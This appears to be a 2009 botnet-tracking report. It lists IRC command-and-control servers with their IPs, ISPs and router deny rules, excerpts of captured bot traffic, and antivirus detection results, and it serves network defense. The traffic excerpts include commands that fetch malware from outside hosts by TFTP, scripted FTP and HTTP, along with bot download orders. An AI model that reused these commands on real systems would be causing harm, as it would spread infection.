MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanAtraps.MQB
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalBehav-004
SunbeltMISSED
SymantecSpybot.Worm
TheHackerMISSED
TrendMicroSPYBOT.BIM
VBA32MISSED
VirusBusterRBot.Gen.3
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 65520 Filter deny ip host 193.104.94.11 any log ! 2 infects 11/05/09 to 11/05/09 ipaper.com ISP block for pi assignments
Clients 2 united kingdom Activity Domain ipaper.com
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 118.221.35.162 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 118.221.35.162 get dllhost.exe wins\\DLLHOST.EXE
  • Client: NICK biymeivyUSER p020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :u. PRIVMSG biymeivy :!get http:/sleepatnight.cn/oc/box.txt
  • Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
  • Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu
  • Server: PONG :k.
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDldr.Agent.LF
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebInject.6445
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetKrap.AH
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusPacked.Krap
KasperskyPacked.Krap.ah
McAfeeMISSED
MicrosoftVirTool_Obfuscator.HG
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecPacked.Generic.258
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 2 TCP Ports 2569 3938 Filter deny ip host 89.149.227.51 any log ! 2 infects 10/16/09 to 10/17/09 internetserviceteam.com ISP netdirekt e.k
Clients 2 germany Activity Domain internetserviceteam.com
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 113.253.112.208 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 113.253.112.208 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER smpbcb smpbcb smpbcb :gywmthsyspraopyh
  • Client: NICK tiHIjEan
  • Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.foonet.com NOTICE AUTH :*** Couldn\\'t resolve your...
  • Client: MODE tiHIjEan +xi
  • Server: File is missing:tiHIjEan MODE tiHIjEan :+iwx
  • Client: JOIN ##russia## USERHOST tiHIjEan
  • Client: MODE ##russia## +smntu
  • Client: GET /dive.exe HTTP/1.0Host: 89.149.227.51

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirPalevo.jur.20
AuthentiumMISSED
Avast_Trojan-gen
AVGDropper.Generic.AYVO
BitDefenderGeneric.2518038
CAT-QuickHealAgent.ATV
ClamAVMISSED
DrWebIRC.Sdbot.5190
eSafeTrojanProxyRan
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetPossibleThreat
F-ProtMISSED
F-SecureMISSED
IkarusPushbot
KasperskyP2P-Palevo.jur
McAfeeAutorun.aah
MicrosoftMalagent
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecIRCBot
TheHackerMISSED
TrendMicroTROJ_AGENT.ICZZ
VBA32Kolab.ear
VirusBusterP2P.Palevo.EAN
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 3305 Filter deny ip host 212.54.2.171 any log ! 1 infects 10/30/09 to 10/30/09 megabaud.fi ISP elisa oyj
Clients 1 finland Activity Domain megabaud.fi
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 202.157.56.125 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 202.157.56.125 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|nold11864USER zspnyxd3k * 0 :USA|2K|633
  • Server: :hub.35869.net 001 P|nold11864...
  • Client: USERHOST P|nold11864
  • Server: :hub.35869.net 302 P|nold11864...
  • Client: USERHOST P|nold11864MODE P|nold11864 JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirTRDropper.Gen
AuthentiumThreat-HLLIYE!Eldorado
Avast_DCom-F
AVGHeur
BitDefenderPacker.Yoda.A
CAT-QuickHealIRCBot.idc
ClamAVMISSED
DrWebHLLW.Piabot
eSafeTRDropper
eTrust-VetIRCBot.KU
EwidoMISSED
FileAdvisorMISSED
FortinetPossibleThreat
F-ProtThreat-HLLIYE!Eldorado
F-SecureIRCBot.idc
IkarusExploit.MS06040
KasperskyIRCBot.idc
McAfeeMISSED
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanSmalltroj.MTNE
PandaGaobot.OXI.worm
Prevx1MISSED
RisingMS06-040.b
SophosMalPacker
SunbeltWootbot.gen
SymantecSpybot.Worm
TheHackerBackdoorIRCBot.idc
TrendMicroTROJ_LSADCOM.MCL
VBA32Kolabc.gco
VirusBusterIRCBot.AAWX
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 6669 Filter deny ip host 93.156.203.49 any log ! 1 infects 07/16/09 to 07/16/09 cm-93-156-61-10.telecable.es ISP telecable
Clients 1 spain Activity Domain cm-93-156-61-10.telecable.es
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR javaflash.exe
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK USA|5502108USER veitija 0 0 :USA|5502108
  • Server: :fart.bitchassness.shit NOTICE USA|5502108 :*** If you are having...
  • Server: PONG :C5777CD6
  • Client: JOIN ##!cyber whores
  • Client: USERHOST USA|5502108MODE USA|5502108 +xiJOIN ##!cyber...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumVirut.7116
Avast_Virtob
AVGVirut
BitDefenderVirtob.8.Gen
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebPoison.686
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtVirut.7116
F-SecureVirut.av
IkarusVirut.av
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanVirut.AG
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterVirut.Gen.4
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 3305 Filter deny ip host 62.128.152.250 any log ! 1 infects 08/03/09 to 08/03/09 calnea.com ISP _ netbenefit dedicated servers sovereign house_
Clients 1 united kingdom Activity Domain calnea.com
Chatter Example
  • Client: USER xxcupq
  • Server: echo open 130.15.63.51 54236 >> asr_xxcup &echo user xxcupq...
  • Client: PASS xxcupq
  • Client: user xxcupq xxcupq 331230
  • Server: RETR asr_41061.exe
  • Client: PASS secretpass
  • Client: NICK P|qvb4xgt76USER eek6x2dlg * 0 :USA|XP|058
  • Server: :hub.58835.net 001 P|qvb4xgt76...
  • Client: USERHOST P|qvb4xgt76
  • Server: :hub.58835.net 302 P|qvb4xgt76...
  • Client: USERHOST P|qvb4xgt76MODE P|qvb4xgt76 JOIN #mm RSA
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net
  • Server: PING :hub.58835.net
  • Server: PONG hub.58835.net

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.Gen
AntiVirTRATRAPS.Gen
AuthentiumMISSED
Avast_DCom-F
AVGSHeur2.AOLW
BitDefenderGeneric.Mydoom.F72197F1
CAT-QuickHealAgent.gen
ClamAVMISSED
DrWebHLLW.Piabot.origin
eSafeMISSED
eTrust-VetIRCBot.PJ
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolabc.gza
IkarusExploit.MS06040
KasperskyKolabc.gza
McAfeeSpybot.worm!l
MicrosoftExploit_MS06040.gen
NOD32v2MISSED
NormanAtraps.MQB
PandaTrjCI.A
Prevx1MISSED
RisingMISSED
SophosMalBehav-004
SunbeltMISSED
SymantecSpybot.Worm
TheHackerMISSED
TrendMicroSPYBOT.BIM
VBA32MISSED
VirusBusterRBot.Gen.3
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 7575 Filter deny ip host 218.10.16.78 any log ! 1 infects 07/01/09 to 07/01/09 - ISP china unicom heilongjiang province network
Clients 1 china Activity Domain -
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 113.252.244.40 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 113.252.244.40 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 113.252.244.40 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER ziucwj ziucwj ziucwj :jrmsiaivxwuejgkz
  • Client: NICK knCcrgnd
  • Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
  • Server: :irc.foonet.com NOTICE AUTH :*** Couldn\\'t resolve your...
  • Server: Ccrgnd :MOTD File is missing:knCcrgnd MODE knCcrgnd :+iwx
  • Client: MODE knCcrgnd +xi
  • Client: JOIN ##russia## USERHOST knCcrgnd
  • Client: MODE ##russia## +smntu
  • Client: GET /datafinal.exe HTTP/1.0Host: hi5-gallerys.com
  • Server: GET /nas.exe HTTP/1.0Host: 220.196.42.160

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebIRC.Sdbot.4924
eSafeMISSED
eTrust-VetSlenfbot!generic
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureIRCBot.kzu
IkarusMISSED
KasperskyIRCBot.kzu
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 18067 Filter deny ip host 123.164.66.62 any log ! 1 infects 06/30/09 to 06/30/09 163data.com.cn ISP chinanet heilongjiang province network
Clients 1 china Activity Domain 163data.com.cn
Chatter Example
  • Client: USeR l l l l
  • Client: NiCK l5-000cf7d3
  • Client: PoNG :B5467810
  • Server: :a 001 l5-000cf7d3 :l5-000cf7d3 MODE l5-000cf7d3 :+i
  • Client: USeRHOST l5-000cf7d3
  • Client: JOiN #l5t3 dlrowymx0ri
  • Server: :l5-000cf7d3!l@192.168.1.128 JOIN :#l5t3

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 6667 Filter deny ip host 38.97.225.135 any log ! 1 infects 10/29/09 to 10/29/09 cogentco.com ISP psinet inc
Clients 1 united states Activity Domain cogentco.com
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
  • Server: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314

more....

BotClient Antivirus Diagnoses
AhnLab-V3Parite
AntiVirParite
AuthentiumKorgo.V
Avast_Parite
AVGKorgo.A
BitDefenderPadobot.BV.Dam
CAT-QuickHealPerite.B
ClamAVPadobot.M
DrWebLsabot
eSafe_Parite_B
eTrust-VetPinfi.A
EwidoMISSED
FileAdvisorMISSED
FortinetParite.B
F-ProtKorgo.V
F-SecurePadobot.BV.Dam
IkarusPadobot.M
KasperskyPadobot.m
McAfeePate.b
MicrosoftKorgo.V
NOD32v2MISSED
NormanKorgo.V
PandaKorgo.U.worm
Prevx1MISSED
RisingParite.b
SophosParite-B
SunbeltMISSED
SymantecPinfi
TheHackerPate.B
TrendMicroPE_PARITE.A
VBA32Parite.B
VirusBusterPadobot.D
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 3308 Filter deny ip host 217.30.180.76 any log ! 1 infects 10/15/09 to 10/15/09 nebula.fi ISP nebula oy. web hosting pri-dns and streaming
Clients 1 finland Activity Domain nebula.fi
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 125.4.228.60 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 125.4.228.60 get dllhost.exe wins\\DLLHOST.EXE
  • Client: PASS secretpass
  • Client: NICK P|m80s5khyjUSER e5idmiq5g * 0 :USA|2K|865
  • Server: :hub.82.net 001 P|m80s5khyj...
  • Client: USERHOST P|m80s5khyj
  • Server: :hub.82.net 302 P|m80s5khyj :P|m80s5khyj=+e5idmiq5g@192.168.1.209
  • Client: USERHOST P|m80s5khyjMODE P|m80s5khyj JOIN #mm RSA
  • Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.B
AntiVirVirut.AX
AuthentiumVirut.7116
Avast_Virtob
AVGVirut
BitDefenderVirtob.8.Gen
CAT-QuickHealVirut.Z
ClamAVVirut-54
DrWebVirut.30
eSafeMISSED
eTrust-VetVirut.7115
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.AV
F-ProtVirut.7116
F-SecureVirut.av
IkarusKolabc
KasperskyVirut.av
McAfeeVirut.gen.a
MicrosoftVirut.AC
NOD32v2MISSED
NormanVirut.AG
PandaVirutas.FG
Prevx1MISSED
RisingVirut.an
SophosVirut-W
SunbeltMISSED
SymantecVirut.W
TheHackerVirut.av
TrendMicroPE_VIRUT.AV
VBA32Virut.2
VirusBusterVirut.Gen.4
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 5555 Filter deny ip host 200.204.157.111 any log ! 1 infects 07/11/09 to 07/11/09 sterlingstudents.net ISP comite gestor da internet no brasil
Clients 1 brazil Activity Domain sterlingstudents.net
Chatter Example
  • Client: NICK USA|3073090USER fpybefnye 0 0 :USA|3073090
  • Server: :HTTP1.4 NOTICE AUTH :*** eh...
  • Server: :HTTP1.4 001 USA|3073090 :HTTP1.4 002 USA|3073090 :HTTP1.4 003...
  • Client: USERHOST USA|3073090
  • Client: MODE USA|3073090 -x+iJOIN #ddos# drenyUSERHOST USA|3073090MODE...
  • Server: :USA|3073090!fpybefnye@192.168.1.150 JOIN :#ddos#:HTTP1.4 332...
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4
  • Client: JOIN #ddos# dreny
  • Server: PONG :HTTP1.4

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirMISSED
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderMISSED
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMISSED
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
TrendMicroMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 80 216 Filter deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 jws.com ISP godaddy.com inc
Clients 1 united states Activity Domain jws.com
Chatter Example
  • Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...
  • Client: USER anonymous
  • Client: PASS bin
  • Server: RETR 12394_upload.exe
  • Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...
  • Server: GET /result?52552 HTTP/1.0User-Agent: Opera/9.00 (Windows NT 5.1;...
  • Server: GET /h2/mainh.gif?528fb=338171 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?531c5=680842 HTTP/1.0User-Agent: KUKU...
  • Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET /h2/?s=938 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
  • Server: GET /home_imag/mainf.gif?53e68=1718280 HTTP/1.0User-Agent: KUKU...
  • Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?54bf5=1041375 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/mainf.gif?54df8=1738200 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?54ea4=3478120 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?55aaa=2105340 HTTP/1.0User-Agent: KUKU...
  • Server: GET /utest/?jutr=31444&oo=2&57835=264973&ra=0 HTTP/1.0User-Agent:...
  • Server: GET /test/gewtghywa.dat HTTP/1.0X-Forwarded-For:...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Kashu.B
AntiVirSality.Y
AuthentiumSasser.E
Avast_Sality
AVGI-Sasser.E
BitDefenderGeneric.24440
CAT-QuickHealSality.R
ClamAVSasser.H
DrWebSector.5
eSafeMISSED
eTrust-VetSality.AA
EwidoMISSED
FileAdvisorMISSED
FortinetSality.AA
F-ProtSasser.E
F-SecureSasser.D
IkarusEmail-Plexus.E
KasperskySality.aa
McAfeeSality.gen
MicrosoftSality.AM
NOD32v2MISSED
NormanSasser.E
PandaSasser.E.worm
Prevx1MISSED
RisingKUKU.GEN
SophosSality-AM
SunbeltMISSED
SymantecSality.AE
TheHackerSality.gen
TrendMicroPE_SALITY.EN
VBA32Sality.kaka
VirusBusterSasser.E
Webwasher
Gateway
MISSED
Priority 1 TCP Ports 80 Filter deny ip host 194.67.57.20 any log ! 1 infects 09/03/09 to 09/03/09 mail.ru ISP sovintel-msk-netbridge-ervices-net
Clients 1 russian federation Activity Domain mail.ru
Chatter Example
  • Client: GET /lsd HTTP/1.0User-Agent: bHost: 66.220.226.83:50929
  • Server: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRDropper.Gen
AuthentiumHeuristic-MUP!Eldorado
Avast_Padobot-D@UPX
AVGMISSED
BitDefenderGeneric.69904
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeWormPoxdar.A.D
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtHeuristic-MUP!Eldorado
F-SecureMISSED
IkarusMISSED
KasperskyMISSED
McAfeeMISSED
MicrosoftPoxdar.A
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalHckPk-E
SunbeltMISSED
SymantecPoxdar
TheHackerMISSED
TrendMicroPAK_Generic.001
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
MISSED